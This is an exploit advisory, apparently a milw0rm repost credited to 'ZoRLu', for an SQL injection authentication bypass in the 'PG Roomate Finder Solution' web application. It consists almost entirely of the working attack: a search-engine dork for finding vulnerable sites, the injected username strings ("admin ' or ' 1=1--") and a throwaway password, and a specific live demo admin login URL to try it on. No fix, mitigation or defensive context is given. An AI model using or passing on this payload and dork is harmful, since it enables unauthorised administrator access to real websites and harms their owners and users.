PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability

PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7201

Discovered By: ZoRLu

dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin


exploit for demo:

login: http://www.realtysoft.pro/roommate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu